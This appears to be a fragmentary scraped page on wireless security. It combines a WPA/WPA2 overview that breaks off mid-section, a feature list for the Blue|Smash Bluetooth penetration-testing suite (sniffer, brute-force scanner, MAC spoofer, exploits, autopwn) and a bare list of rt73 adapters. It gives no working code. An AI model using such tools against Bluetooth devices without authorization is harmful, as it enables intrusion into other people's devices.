Wi-Fi Protected Access (WPA and WPA2) is a class of systems to secure wireless (Wi-Fi) computer networks. It was created in response to several serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP). WPA implements the majority of the IEEE 802.11i standard, and was intended as an intermediate measure to take the place of WEP while 802.11i was prepared. WPA is specifically designed to also work with pre-WPA wireless network interface cards (through firmware upgrades), but not necessarily with first generation wireless access points. WPA2 implements the full standard, but will not work with some older network cards. WPA2 implements the mandatory elements of 802.11i. In particular, it introduces a new AES-based algorithm, CCMP, that is considered fully secure. From March 13, 2006, WPA2 certification is mandatory for all new devices wishing to be Wi-Fi certified. Security in pre-shared key mode Pre-shared key mode (PSK, also known as personal mode)

Blue|Smash

Blue|Smash is a free open source bluetooth pentest suite, powered by python for linux. Here is a list of some of the tools included. Sorbo's Frontline bluetooth sniffer. A bruteforce scanner Mac address spoofer Load's of exploits Autopwn vunrebility checker CSR Firmware Backup/Updater Version 1.* is only for the backtrack live CD, but verson 2.* will be for most linux distrobutions.
The rt73 cards are: Edimax EW-7318USg / Hawking HWUG1 / Alfa AWUS036s D-Link DWL-G122 C1 Linksys WUSB54GC Belkin F5D7050 Ver 3 Asus WL-167g